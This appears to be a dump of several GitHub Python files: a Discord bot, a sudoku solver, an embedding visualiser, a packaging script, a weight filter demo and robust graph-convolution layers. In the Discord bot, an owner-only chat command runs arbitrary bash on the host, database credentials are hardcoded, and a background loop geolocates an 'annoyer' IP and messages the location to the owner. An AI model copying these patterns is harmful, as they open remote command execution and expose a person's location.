await bot.db.fetchrow(\"SELECT * FROM prefixes WHERE guild_id=$1\",msg.guild.id)\n except AttributeError:\n data = None\n if data == None:\n prefixes = [\"c!\"]\n else:\n prefixes = data[\"prefix\"]\n prefixes = prefixes.split(\",\")\n to_pop = len(prefixes) - 1\n prefixes.pop(to_pop)\n return commands.when_mentioned_or(*prefixes)(bot,msg)\n\n\nprint(discord.__version__)\nbot = commands.Bot(command_prefix= get_prefixes)\n\nasync def set_up_token():\n credentials = {\"user\": \"zachary\", \"password\": \"capn\", \"database\": \"capnbot\", \"host\": \"127.0.0.1\"}\n db = await asyncpg.create_pool(**credentials) \n data = await db.fetchrow(\"SELECT * FROM keys;\")\n global TOKEN\n TOKEN = data[\"test_token\"]\n TOKEN = data[\"real_token\"]\n\n\nbot.blacklist= []\nbot.launch_time = time.time()\nbot.counter = 0\ntry:\n dweep = dweepy.get_latest_dweet_for('CapnBot')[0]\n dweet = dweep['content']\n bot.webmessage = dweet['msg']\nexcept:\n bot.webmessage = \"\"\n\n\n @bot.command(aliases=[\"bash\", \"shell\", \"sh\", \"console\"])\n async def cmd(ctx, *, code):\n if not ctx.author.id == 422181415598161921:\n return\n def runshell(code):\n with subprocess.Popen([\"/bin/bash\", \"-c\", code], stdout=subprocess.PIPE, stderr=subprocess.PIPE) as process:\n out, err = process.communicate(timeout=60)\n if err:\n return [f\"```fix\\n{code}``` ```fix\\n-- stdout --\\n\\n{out.decode()}``` ```fix\\n-- stderr --\\n\\n{err.decode()}```\", out.decode(), err.decode()]\n else:\n return [f\"```fix\\n{code}``` ```fix\\n-- stdout --\\n\\n{out.decode()}```\", out.decode(), err.decode()]\n result = await bot.loop.run_in_executor(None, runshell, code)\n try:\n await ctx.send(result[0])\n except Exception:\n await ctx.send(f\"**:arrow_up: | Looks like output is too long. Attempting upload to Mystbin.**\")\n try:\n async with aiohttp.ClientSession().post(\"http://mystb.in/documents\", data=f\"{result[1]}\\n\\n\\n\\n{result[2]}\".encode('utf-8')) as post:\n post = await post.json()\n await ctx.send(f\"**:white_check_mark: | http://mystb.in/{post['key']}**\")\n except Exception:\n await ctx.send(\"**:x: | Couldn't upload to Mystbin.**\") \n\n\n@bot.group(invoke_without_command=True)\n@commands.guild_only()\nasync def prefix(ctx, prefix):\n await ctx.send(\"Missing an argument(add, clear, or show).\")\n\n\n@prefix.command()\n@commands.guild_only()\nasync def add(ctx,prefix):\n '''Sets a new prefix for the guild'''\n if not ((ctx.author.id == 422181415598161921) or (ctx.author.guild_permissions.administrator)):\n return await ctx.send(\"You don't have the permissions to use this command.\")\n data = await bot.db.fetchrow(\"SELECT * FROM prefixes WHERE guild_id=$1\",ctx.guild.id)\n new_prefix = prefix + \",\"\n if data == None:\n await bot.db.execute(\"INSERT INTO prefixes VALUES ($1,$2);\", ctx.guild.id, prefix)\n else:\n prefixes = data[\"prefix\"]\n new_prefix = prefixes + new_prefix\n await bot.db.execute(\"UPDATE prefixes SET prefix=$1 WHERE guild_id=$2;\", new_prefix, ctx.guild.id)\n await ctx.send(f\"The Prefix {prefix} can now be used to call commands.\")\n\n@prefix.command()\n@commands.guild_only()\nasync def clear(ctx):\n '''Clears all prefixes from the guild'''\n if not ctx.author.id == 422181415598161921:\n return await ctx.send(\"Not Enough Perms\")\n await bot.db.execute('UPDATE prefixes SET prefix=$1 WHERE guild_id=$2;', 'c!,', ctx.guild.id)\n await ctx.send(\"Prefixes cleared. The only prefix that can be used is c!\")\n\n@prefix.command()\n@commands.guild_only()\nasync def show(ctx):\n '''Shows prefixes for the guild'''\n data = await bot.db.fetchrow(\"SELECT * FROM prefixes WHERE guild_id=$1\",ctx.guild.id)\n if data == None:\n prefixes = [\"c!\"]\n else:\n prefix = data[\"prefix\"]\n prefixes = prefix.split(\",\")\n if len(prefixes) == 2:\n return await ctx.send(\"The prefix for this server is \" + prefixes[0])\n elif len(prefixes) == 3:\n return await ctx.send(\"The prefixes for this server are \" + prefixes[0] + \" and \" + prefixes[1])\n else:\n msg= \"\"\n i = 2\n for x in prefixes:\n if i == len(prefixes):\n msg = msg + \", and \" + x\n break\n elif i == 2:\n msg = x\n else:\n msg = msg + \", \" + x\n i+=1\n return await ctx.send(\"The prefixes for this server are \"+ msg)\n \n\n@bot.command()\nasync def ping(ctx):\n 'Pings Bot'\n channel = ctx.channel\n t1 = time.perf_counter()\n await channel.trigger_typing()\n t2 = time.perf_counter()\n latency = round(bot.latency *1000)\n t = round((t2-t1)*1000)\n green = discord.Color.green()\n desc=f\":heartbeat: **{latency}**ms \\n :stopwatch: **{t}**ms\"\n em = discord.Embed(title = \":ping_pong: Pong\",description = desc, color = green)\n em.set_footer(text=f\"Requested by {ctx.author.name}\",icon_url=ctx.author.avatar_url)\n await ctx.send(embed=em)\n \n\n@bot.command()\nasync def pong(ctx):\n 'Also Pings Bot'\n channel = ctx.channel\n t1 = time.perf_counter()\n await channel.trigger_typing()\n t2 = time.perf_counter()\n latency = round(bot.latency *1000)\n t = round((t2-t1)*1000)\n green = discord.Color.green()\n desc=f\":heartbeat: **{latency}**ms \\n :stopwatch: **{t}**ms\"\n em = discord.Embed(title = \":ping_pong: Ping?\",description = desc, color = green)\n em.set_footer(text=f\"Requested by {ctx.author.name}\",icon_url=ctx.author.avatar_url)\n await ctx.send(embed=em)\n\n\ndef get_channel(channel_name):\n for channel in bot.get_all_channels():\n if channel.name == channel_name:\n return channel\n return None\n\n\n@bot.command()\nasync def quit(ctx):\n '''Quits bot'''\n if ctx.author.id == 422181415598161921:\n await bot.close()\n else:\n await ctx.send('Permission Denied')\n\n@bot.command()\nasync def load(ctx, extension_name: str):\n 'Loads an extension.'\n if not ctx.author.id == 422181415598161921:\n return\n cog = \"cogs.\"+extension_name\n bot.load_extension(cog)\n await ctx.send('{} loaded.'.format(extension_name))\n\n@bot.command()\nasync def unload(ctx,cog):\n '''Unloads an Extension'''\n if not ctx.author.id == 422181415598161921:\n return\n cog = \"cogs.\"+cog\n bot.unload_extension(cog)\n await ctx.message.add_reaction(\"\\U00002705\")\n \n@bot.command()\nasync def reload(ctx,*,cog):\n '''Reloads an Extension'''\n if not ctx.author.id == 422181415598161921:\n return\n if cog == \"all\":\n for cogs in bot.cogs:\n bot.unload_extension(cogs)\n bot.load_extension(cogs)\n await ctx.message.add_reaction(\"\\U00002705\")\n return\n cog = \"cogs.\"+cog\n bot.unload_extension(cog)\n bot.load_extension(cog)\n await ctx.message.add_reaction(\"\\U00002705\")\n\n@bot.command()\nasync def notifyall(ctx, *, args):\n '''Sends a Message in All Servers'''\n if not ctx.author.id == 422181415598161921:\n return\n for guild in bot.guilds:\n for channel in guild.channels:\n if isinstance(channel, discord.TextChannel):\n await channel.send(args)\n\n@commands.command()\nasync def upvote(self,ctx):\n '''Sends a link to upvote my bot'''\n await ctx.send(\"https://discordbots.org/bot/448915931507458048\")\n\n\nasync def _get_owner():\n bot.owner = (await bot.application_info()).owner\n\n@bot.event\n@asyncio.coroutine\nasync def on_ready():\n await _get_owner()\n extensions = [\"fun\",\"duel\",\"Roles\",\"misc\",\"regular\",\"games\",\"internet\",\"Working Music\", \\\n \"Error Handling\",\"calculation\",\"chatbot\",\"fortnite\", \"bot\", \"twitter\", \"twitch\", \"tags\", \\\n \"images\", \"star\"]\n for extension in extensions:\n bot.load_extension(\"cogs.\"+extension)\n bot.load_extension('jishaku')\n credentials = {\"user\": \"zachary\", \"password\": \"capn\", \"database\": \"capnbot\", \"host\": \"127.0.0.1\"}\n bot.db = await asyncpg.create_pool(**credentials)\n data = await bot.db.fetchrow(\"SELECT user_id FROM users WHERE blacklisted=true;\")\n try:\n for user in data:\n bot.blacklist.append(user)\n except:\n pass\n data = await bot.db.fetch(\"SELECT command_name from commands;\")\n commands = []\n for command in data:\n commands.append(command[\"command_name\"])\n for command in bot.commands:\n if command.qualified_name not in commands:\n await bot.db.execute(\"INSERT INTO commands VALUES($1,0);\",command.qualified_name)\n await bot.change_presence(activity=discord.Game(name=\"c!help\")) \n print('------')\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n print('------')\n\n@bot.event\nasync def on_message_edit(before,after):\n if not after.author.id in bot.blacklist:\n await bot.process_commands(after)\n \n@bot.event\nasync def on_message(message):\n if (message.author.bot):\n return\n if not message.guild:\n return await bot.process_commands(message)\n if message.author.id in bot.blacklist:\n return\n if message.content.endswith(\"?\"):\n prefixes = await get_prefixes(bot, message)\n prefix = prefixes[0]\n message.content = prefix + message.content[:-1]\n await bot.process_commands(message)\n\n@bot.event\nasync def on_command(ctx):\n name = ctx.command.qualified_name\n if \" \" in name:\n msg = \"\"\n for char in name:\n if char != \" \":\n msg = msg+char\n else:\n name=msg\n break\n data = await bot.db.fetchrow(\"SELECT * FROM commands WHERE command_name = $1;\",name)\n uses = int(data[\"uses\"])\n uses+=1\n await bot.db.execute(\"UPDATE commands SET uses=$1 WHERE command_name=$2;\",uses,name)\n bot.counter += 1\n\n\n@bot.event\nasync def on_member_join(member):\n data = await bot.db.fetchrow('SELECT * FROM tracked_channels WHERE guild_id = $1;', member.guild.id)\n if data:\n channel = member.guild.get_channel(data['channel_id'])\n try:\n await channel.edit(name=\"User Count: \"+str(len(member.guild.members)))\n except discord.errors.Forbidden:\n pass\n\n@bot.event\nasync def on_member_remove(member):\n data = await bot.db.fetchrow('SELECT * FROM tracked_channels WHERE guild_id = $1;', member.guild.id)\n if data:\n channel = member.guild.get_channel(data['channel_id'])\n try:\n await channel.edit(name=\"User Count: \"+str(len(member.guild.members)))\n except discord.errors.Forbidden:\n pass\n\nasync def update_guild_count():\n await bot.wait_until_ready()\n await asyncio.sleep(10)\n while not bot.is_closed():\n data = await bot.db.fetchrow(\"SELECT * FROM keys;\")\n key = data[\"dbl_key\"]\n auth = {\"Authorization\": key}\n server_count = {\"server_count\":len(bot.guilds)}\n async with aiohttp.ClientSession(headers=auth) as session:\n await session.post(f\"https://discordbots.org/api/bots/{bot.user.id}/stats\", data=server_count)\n await asyncio.sleep(86400)\n\nasync def webserver():\n await bot.wait_until_ready()\n while not bot.is_closed():\n try:\n dweep = dweepy.get_latest_dweet_for('CapnBot')[0]\n dweet = dweep['content']\n message = dweet['msg']\n if message != bot.webmessage:\n user = await bot.get_user_info(422181415598161921)\n await user.send(message)\n bot.webmessage = message\n dweep = dweepy.get_latest_dweet_for('CapnBotIP')[0]\n dweet = dweep['content']\n ip = dweet['msg']\n async with aiohttp.ClientSession() as session:\n async with session.get(\"http://ip-api.com/json/\"+ip) as resp:\n data = await resp.json()\n country = data.get(\"country\")\n region = data.get(\"regionName\")\n city = data.get(\"city\")\n zipcode = data.get(\"zip\")\n isp = data.get(\"isp\")\n lat = data.get(\"lat\")\n lon = data.get(\"lon\")\n yellow = discord.Color.gold()\n em = discord.Embed(title=\"Annoyer Data\",description=ip,color=yellow)\n em.add_field(name=\"Country\",value=country)\n em.add_field(name=\"City\",value=f\"{city}, {region}\")\n em.add_field(name=\"Zipcode\",value=str(zipcode))\n em.add_field(name=\"ISP\",value=isp)\n em.add_field(name=\"Latitude\",value=str(lat))\n em.add_field(name=\"Longitude\",value=str(lon))\n await user.send(embed=em)\n except :\n pass\n await asyncio.sleep(60)\n\n\nbot.loop.run_until_complete(set_up_token())\nbot.loop.create_task(webserver())\nbot.loop.create_task(update_guild_count())\nbot.run(TOKEN)\n","repo_name":"CapnS/CapnBot","sub_path":"CapnBot.py","file_name":"CapnBot.py","file_ext":"py","file_size_in_byte":13654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"41303859994","text":"\nclass Grid:\n \"\"\"Encapsulates a grid of squares, each containing \n possible values, and methods to solve the sudoku\"\"\"\n \n #----------------------------------------------------------------------------\n def __init__(self, param):\n \"\"\"If param is another grid this creates a copy, otherwise \n creates a new grid with the given sector dimension \n and with all squares containing all possible values\"\"\"\n \n from . square import Square\n \n if type(param) is type(self):\n \n self._sectorDimension = param._sectorDimension\n \n self._gridDimension = param._gridDimension\n \n self._rows = [[Square(sqr) for sqr in row]\n for row in param._rows]\n else:\n \n if param < 1:\n \n raise ValueError( \"Cannot create a grid with\"\n + \" a sector dimension of %s\"\n % param)\n \n self._sectorDimension = param\n \n self._gridDimension = param ** 2\n \n self._rows = [[Square(self._gridDimension)\n for rowIndex in range(self._gridDimension)]\n for colIndex in range(self._gridDimension)]\n \n #----------------------------------------------------------------------------\n def setSquareValue(self, colIndex, rowIndex, value):\n \"\"\"Sets the square in the given location to contain \n the given value as its only possibility\"\"\"\n \n if not ( 0 <= colIndex < self._gridDimension\n and 0 <= rowIndex < self._gridDimension):\n \n raise ValueError(\"Cannot index a grid of dimension %s with (%s, %s)\"\n % (self._gridDimension, colIndex, rowIndex))\n \n self._rows[rowIndex][colIndex].setValue(value)\n \n self._removeRelatedPossibilities(colIndex, rowIndex, value)\n \n #----------------------------------------------------------------------------\n def isPossible(self):\n \"\"\"Returns True if every square still \n has at least one possible value\"\"\"\n \n return all([square.isPossible() for row in self._rows\n for square in row])\n \n #----------------------------------------------------------------------------\n def isComplete(self):\n \"\"\"Returns True if every square has only \n a single value, when a grid is complete \n it has to be a valid sudoku\"\"\"\n \n return all([square.getValue() for row in self._rows\n for square in row])\n \n #----------------------------------------------------------------------------\n def refine(self):\n \"\"\"Applies further rules to the \n grid to deduce squares values\"\"\"\n \n targetIndexes = None\n \n colIndex, rowIndex = 0, 0\n \n while (colIndex, rowIndex) != targetIndexes:\n \n deducedValue = self._deduceSquare(colIndex, rowIndex)\n \n if deducedValue:\n \n self.setSquareValue(colIndex, rowIndex, deducedValue)\n \n if not self.isPossible():\n \n break\n \n if not targetIndexes or deducedValue:\n \n targetIndexes = colIndex, rowIndex\n \n colIndex += 1\n \n if colIndex >= self._gridDimension:\n \n colIndex = 0\n \n rowIndex += 1\n \n if rowIndex >= self._gridDimension:\n \n rowIndex = 0\n \n #----------------------------------------------------------------------------\n def _deduceSquare(self, colIndex, rowIndex):\n \"\"\"Tries to apply rules to this square to \n deduce its value, returns the deduced value \n or None if no deduction could be made\"\"\"\n \n square = self._rows[rowIndex][colIndex]\n \n if not square.isPossible() or square.getValue():\n \n return None\n \n for possibility in square.getPossibilities():\n \n if ( self._mustBeValueByRow (square, rowIndex, possibility)\n or self._mustBeValueByCol (colIndex, rowIndex, possibility)\n or self._mustBeValueBySector(colIndex, rowIndex, possibility)):\n \n return possibility\n \n return None\n \n #----------------------------------------------------------------------------\n def _mustBeValueByRow(self, targetSqaure, rowIndex, possibility):\n \"\"\"Returns true if the given possibility \n must be the value for the given square\"\"\"\n \n return not any([square.hasPossibility(possibility)\n for square in self._rows[rowIndex]\n if square is not targetSqaure])\n \n #----------------------------------------------------------------------------\n def _mustBeValueByCol(self, colIndex, rowIndex, possibility):\n \"\"\"Returns true if the given possibility \n must be the value for the given square\"\"\"\n \n return not any([self._rows[index][colIndex].hasPossibility(possibility)\n for index in range(self._gridDimension)\n if index is not rowIndex])\n \n #----------------------------------------------------------------------------\n def _mustBeValueBySector(self, colIndex, rowIndex, possibility):\n \"\"\"Returns true if the given possibility \n must be the value for the given square\"\"\"\n \n return not any([self._rows[iterRows][iterCols].hasPossibility(possibility)\n for (iterCols, iterRows) in\n self._getSquaresInSector(colIndex, rowIndex)])\n \n #----------------------------------------------------------------------------\n def split(self):\n \"\"\"Chooses a square that has two or more possibilities\n and returns a list containing new versions of this\n grid each with the chosen square containing one of\n those possibilities\"\"\"\n\n def countPossibilities(indexes):\n \n colIndex, rowIndex = indexes\n \n return len(self._rows[rowIndex][colIndex].getPossibilities())\n \n indexes = [(colIndex, rowIndex)\n for rowIndex in range(self._gridDimension)\n for colIndex in range(self._gridDimension)\n if countPossibilities((colIndex, rowIndex)) > 1] \n \n if len(indexes) is 0:\n \n raise RuntimeError( \"Could not split grid as there \"\n + \"were no viable squares to split\")\n\n colIndex, rowIndex = min(indexes, key = countPossibilities)\n \n gridCopies = [Grid(self) for count in\n range(countPossibilities((colIndex, rowIndex)))]\n\n square = self._rows[rowIndex][colIndex]\n \n for index, possibility in enumerate(square.getPossibilities()):\n \n gridCopies[index].setSquareValue(colIndex, rowIndex, possibility)\n \n return gridCopies\n \n #----------------------------------------------------------------------------\n def getGridString(self):\n \"\"\"Returns a string that displays the grid's \n state in a human-digestible 2D format\"\"\"\n \n maxValueLength = len(str(self._sectorDimension ** 2))\n \n sectorDivider = \"-\" * (maxValueLength + 2) * self._sectorDimension\n \n dividerLine = \"+\".join([sectorDivider] * self._sectorDimension)\n \n gridValues = [[str(square.getValue() or \".\").center(maxValueLength + 2)\n for square in row] for row in self._rows]\n \n dividerIndexes = range(self._gridDimension - self._sectorDimension,\n 0, -self._sectorDimension)\n \n for row, index in [(row, index) for row in gridValues\n for index in dividerIndexes]:\n row.insert(index, \"|\")\n \n rowValues = [\"\".join(row) for row in gridValues]\n \n for index in dividerIndexes:\n \n rowValues.insert(index, dividerLine)\n \n return \"\\n\".join(rowValues) \n \n #----------------------------------------------------------------------------\n def getStateLine(self):\n \"\"\"Returns a string where each character represents a square value. \n Squares a listed left to right, top to bottom and any squares \n which don't have a value are shown represented as '.'\"\"\"\n \n if self._sectorDimension > 3:\n \n raise RuntimeError( \"Cannot create a state line for\"\n + \" a grid with a dimension of %s\"\n % self._sectorDimension)\n \n gridValues = [square.getValue() or \".\" for row in self._rows\n for square in row]\n\n return \"\".join([str(value) for value in gridValues])\n \n #----------------------------------------------------------------------------\n def _removeRelatedPossibilities(self, colIndex, rowIndex, possibility):\n \"\"\"Removes the given possibility from related \n squares but not from the given square itself\"\"\"\n \n # Remove the possibility from squares in the row\n column = self._rows[rowIndex]\n \n for colIndexInRow in [index for index in range(self._gridDimension)\n if index is not colIndex]:\n \n self._removePossibility(colIndexInRow, rowIndex, possibility)\n \n # Remove the possibility from squares in the column \n for rowIndexInCol in [index for index in range(self._gridDimension)\n if index is not rowIndex]:\n \n self._removePossibility(colIndex, rowIndexInCol, possibility)\n\n sectorIndexes = self._getSquaresInSector(colIndex, rowIndex)\n\n # Remove the possibility from squares in the sector\n for sectorColIndex, sectorRowIndex in sectorIndexes:\n \n self._removePossibility(sectorColIndex, sectorRowIndex, possibility)\n \n #----------------------------------------------------------------------------\n def _removePossibility(self, colIndex, rowIndex, possibility):\n \"\"\"Removes a possibility from a square, if only \n a single value remains for the square then \n all related squares are also updated\"\"\"\n \n square = self._rows[rowIndex][colIndex]\n \n if square.removePossibility(possibility):\n \n value = square.getValue()\n \n if value:\n \n self._removeRelatedPossibilities(colIndex, rowIndex, value)\n \n #----------------------------------------------------------------------------\n def _getSquaresInSector(self, colIndex, rowIndex):\n \"\"\"Returns a list of tuples in the form (colIndex, rowIndex), \n of all the squares in the same sector as the given \n square but excluding the given square itself\"\"\"\n \n sectorRowIndex = int(rowIndex / self._sectorDimension)\n sectorColIndex = int(colIndex / self._sectorDimension)\n\n rowIndexes = list(range(self._sectorDimension * sectorRowIndex,\n self._sectorDimension * (sectorRowIndex + 1)))\n \n colIndexes = list(range(self._sectorDimension * sectorColIndex,\n self._sectorDimension * (sectorColIndex + 1)))\n \n return [(iterColIndex, iterRowIndex) for iterRowIndex in rowIndexes\n for iterColIndex in colIndexes\n if (iterColIndex, iterRowIndex) != (colIndex, rowIndex)]\n","repo_name":"matburton/sudoku_solver","sub_path":"python/sudoku/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":11836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"12724186491","text":"import os\n\nimport tensorflow as tf\nfrom tensorboard.plugins import projector\n\nfrom text_classification.model import BaseTextClassificationModel\n\n\nclass EmbeddingVisualizer:\n \"\"\"\n Static class for text embedding visualization.\n \"\"\"\n @staticmethod\n def visualize_embeddings(model: BaseTextClassificationModel, log_dir: str, dataset: tf.data.Dataset):\n data_text = [txt for txts, labels in dataset for txt in txts]\n data_label = [label for txts, labels in dataset for label in labels]\n\n with open(os.path.join(log_dir, 'metadata.tsv'), \"w\") as f:\n f.write(f\"text \\t label \\n\")\n for i, txt in enumerate(data_text):\n f.write(f\"{txt.numpy().decode('utf-8')}\\t{data_label[i].numpy()}\\n\")\n\n weights = tf.Variable(model.get_embedding_layers_output(data_text))\n checkpoint = tf.train.Checkpoint(embedding=weights)\n checkpoint.save(os.path.join(log_dir, \"embedding.ckpt\"))\n config = projector.ProjectorConfig()\n embedding = config.embeddings.add()\n embedding.tensor_name = \"embedding/.ATTRIBUTES/VARIABLE_VALUE\"\n embedding.metadata_path = 'metadata.tsv'\n projector.visualize_embeddings(log_dir, config)\n","repo_name":"JoannaMisztalRadecka/text_classification_tf","sub_path":"text_classification/embedding_projector.py","file_name":"embedding_projector.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"6724873090","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"msdp\",\n version=\"0.0.5\",\n author=\"Miguel Ángel Alarcos Torrecillas\",\n author_email=\"miguel.alarcos@gmail.com\",\n description=\"Subscription Data Protocol for server side Python and asyncio\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/miguelalarcos/msdp.py\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)","repo_name":"miguelalarcos/msdp.py","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"31286738618","text":"# from kf_book.book_plots import figsize\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nweights = [158.0, 164.2, 160.3, 159.9, 162.1, 164.6, \n 169.6, 167.4, 166.4, 171.0, 171.2, 172.6]\n\ntime_step = 1.0 # day\nscale_factor = 0.4 \n\ndef predict_using_gain_guess(estimated_weight, gain_rate, do_print=False): \n # storage for the filtered results\n estimates, predictions = [estimated_weight], []\n\n # most filter literature uses 'z' for measurements\n for z in weights: \n # predict new position\n predicted_weight = estimated_weight + gain_rate * time_step\n\n # update filter \n estimated_weight = predicted_weight + scale_factor * (z - predicted_weight)\n\n # save and log\n estimates.append(estimated_weight)\n predictions.append(predicted_weight)\n if do_print:\n print(f'measurement: {z:.4}, prediction: {predicted_weight:.4}, estimate: {estimated_weight:.4}')\n\n return estimates, predictions\n\ndef filter_plotting(estimates, predictions, weights):\n time_vector = np.arange(0,len(predictions),1)\n plt.figure(figsize=(16,9))\n plt.plot(estimates[1:], color='blue', marker='o', label='Estimated')\n plt.plot(predictions, color='red', marker='s', label='Predicted')\n plt.plot(weights,color='green', marker='x', label='Weights')\n plt.legend()\n plt.show()\n\ninitial_estimate = 200.\nestimates, predictions = predict_using_gain_guess(\n estimated_weight=initial_estimate, gain_rate=1, do_print=True) \n\n\nfilter_plotting(estimates=estimates, predictions=predictions, weights=weights)","repo_name":"YoussefAbbas2001/Pepso_Repo","sub_path":"Robotics/Navigation/bayesian_filters/gh_Filters/constant_scaling_filter.py","file_name":"constant_scaling_filter.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"25380706342","text":"from typing import Optional\n\nimport dgl\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom dgl import DGLError\n\nfrom graphattack.functional import spmm\nfrom graphattack.functional.transform import dgl_normalize\n\ntry:\n from glcore import dimmedian_idx\nexcept (ModuleNotFoundError, ImportError):\n dimmedian_idx = None\n\ntry:\n from glcore import topk\nexcept (ModuleNotFoundError, ImportError):\n topk = None\n\n\nclass DimwiseMedianConv(nn.Module):\n\n def __init__(self,\n in_feats,\n out_feats,\n add_self_loop=True,\n row_normalize=False,\n norm='none',\n activation=None,\n weight=True,\n bias=True):\n\n super().__init__()\n if norm not in ('none', 'both', 'right', 'left'):\n raise DGLError('Invalid norm value. Must be either \"none\", \"both\", \"right\" or \"left\".'\n ' But got \"{}\".'.format(norm))\n\n if dimmedian_idx is None:\n raise RuntimeWarning(\"Module 'glcore' is not properly installed, please refer to \"\n \"'https://github.com/EdisonLeeeee/glcore' for more information.\")\n\n self._in_feats = in_feats\n self._out_feats = out_feats\n self._norm = norm\n self._add_self_loop = add_self_loop\n self._row_normalize = row_normalize\n self._activation = activation\n\n if weight:\n self.weight = nn.Parameter(torch.Tensor(in_feats, out_feats))\n else:\n self.register_parameter('weight', None)\n\n if bias:\n self.bias = nn.Parameter(torch.Tensor(out_feats))\n else:\n self.register_parameter('bias', None)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n r\"\"\"\n Description\n -----------\n Reinitialize learnable parameters.\n Note\n ----\n The model parameters are initialized as in the\n `original implementation `__\n where the weight :math:`W^{(l)}` is initialized using Glorot uniform initialization\n and the bias is initialized to be zero.\n \"\"\"\n if self.weight is not None:\n nn.init.xavier_uniform_(self.weight)\n\n if self.bias is not None:\n nn.init.zeros_(self.bias)\n\n def forward(self, graph, feat, edge_weight=None):\n r\"\"\"\n\n Description\n -----------\n Compute Graph Convolution layer with\n Weighted Medoid aggregation.\n\n\n Parameters\n ----------\n graph : DGLGraph\n The graph.\n feat : torch.Tensor\n The input feature of shape :math:`(N, D_{in})` where :math:`D_{in}`\n is size of input feature, :math:`N` is the number of nodes.\n edge_weight : torch.Tensor, optional\n Optional edge weight for each edge. \n\n Returns\n -------\n torch.Tensor\n The output feature of shape :math:`(N, D_{out})` where :math:`D_{out}`\n is size of output feature.\n \"\"\"\n\n assert edge_weight is None or edge_weight.size(0) == graph.num_edges()\n\n if self._add_self_loop:\n graph = graph.add_self_loop()\n if edge_weight is not None:\n size = (graph.num_nodes(),) + edge_weight.size()[1:]\n self_loop = edge_weight.new_ones(size)\n edge_weight = torch.cat([edge_weight, self_loop])\n else:\n graph = graph.local_var()\n\n edge_weight = dgl_normalize(graph, self._norm, edge_weight)\n\n if self.weight is not None:\n feat = feat @ self.weight\n\n # ========= weighted dimension-wise Median aggregation ===\n N, D = feat.size()\n row, col, e_id = graph.edges(order='srcdst', form='all')\n edge_index = torch.stack([row, col], dim=0)\n\n if self._norm != 'none':\n # if edge_weight is all 1 and it is not necessary\n # to sort again\n edge_weight = edge_weight[e_id]\n\n median_idx = dimmedian_idx(feat, edge_index, edge_weight, N)\n col_idx = torch.arange(D, device=graph.device).view(1, -1).expand(N, D)\n feat = feat[median_idx, col_idx]\n # Normalization and calculation of new embeddings\n if self._row_normalize:\n row_sum = edge_weight.new_zeros(feat.size(0))\n row_sum.scatter_add_(0, row, edge_weight)\n feat = row_sum.view(-1, 1) * feat\n # ========================================================\n\n if self.bias is not None:\n feat = feat + self.bias\n\n if self._activation is not None:\n feat = self._activation(feat)\n return feat\n\n def extra_repr(self):\n \"\"\"Set the extra representation of the module,\n which will come into effect when printing the model.\n \"\"\"\n summary = 'in={_in_feats}, out={_out_feats}'\n summary += ', normalization={_norm}'\n if '_activation' in self.__dict__:\n summary += ', activation={_activation}'\n return summary.format(**self.__dict__)\n\n\nclass SoftKConv(nn.Module):\n\n def __init__(self,\n in_feats,\n out_feats,\n add_self_loop=True,\n row_normalize=False,\n k=32,\n temperature=1.0,\n with_weight_correction=True,\n norm='none',\n activation=None,\n weight=True,\n bias=True):\n\n super().__init__()\n if norm not in ('none', 'both', 'right', 'left'):\n raise DGLError('Invalid norm value. Must be either \"none\", \"both\", \"right\" or \"left\".'\n ' But got \"{}\".'.format(norm))\n\n if topk is None:\n raise RuntimeWarning(\"Module 'glcore' is not properly installed, please refer to \"\n \"'https://github.com/EdisonLeeeee/glcore' for more information.\")\n\n self._in_feats = in_feats\n self._out_feats = out_feats\n self._norm = norm\n self._add_self_loop = add_self_loop\n self._row_normalize = row_normalize\n self._k = k\n self._temperature = temperature\n self._with_weight_correction = with_weight_correction\n self._activation = activation\n\n if weight:\n self.weight = nn.Parameter(torch.Tensor(in_feats, out_feats))\n else:\n self.register_parameter('weight', None)\n\n if bias:\n self.bias = nn.Parameter(torch.Tensor(out_feats))\n else:\n self.register_parameter('bias', None)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n r\"\"\"\n Description\n -----------\n Reinitialize learnable parameters.\n Note\n ----\n The model parameters are initialized as in the\n `original implementation `__\n where the weight :math:`W^{(l)}` is initialized using Glorot uniform initialization\n and the bias is initialized to be zero.\n \"\"\"\n if self.weight is not None:\n nn.init.xavier_uniform_(self.weight)\n\n if self.bias is not None:\n nn.init.zeros_(self.bias)\n\n def forward(self, graph, feat, edge_weight=None):\n r\"\"\"\n\n Description\n -----------\n Compute Graph Convolution layer with\n Soft Weighted Medoid topk aggregation.\n\n Parameters\n ----------\n graph : DGLGraph\n The graph.\n feat : torch.Tensor\n The input feature of shape :math:`(N, D_{in})` where :math:`D_{in}`\n is size of input feature, :math:`N` is the number of nodes.\n edge_weight : torch.Tensor, optional\n Optional edge weight for each edge. \n\n Returns\n -------\n torch.Tensor\n The output feature of shape :math:`(N, D_{out})` where :math:`D_{out}`\n is size of output feature.\n \"\"\"\n\n assert edge_weight is None or edge_weight.size(0) == graph.num_edges()\n\n if self._add_self_loop:\n graph = graph.add_self_loop()\n if edge_weight is not None:\n size = (graph.num_nodes(),) + edge_weight.size()[1:]\n self_loop = edge_weight.new_ones(size)\n edge_weight = torch.cat([edge_weight, self_loop])\n else:\n graph = graph.local_var()\n edge_weight = dgl_normalize(graph, self._norm, edge_weight)\n\n if self.weight is not None:\n feat = feat @ self.weight\n\n # ========= Soft Weighted Medoid in the top `k` neighborhood ===\n feat = 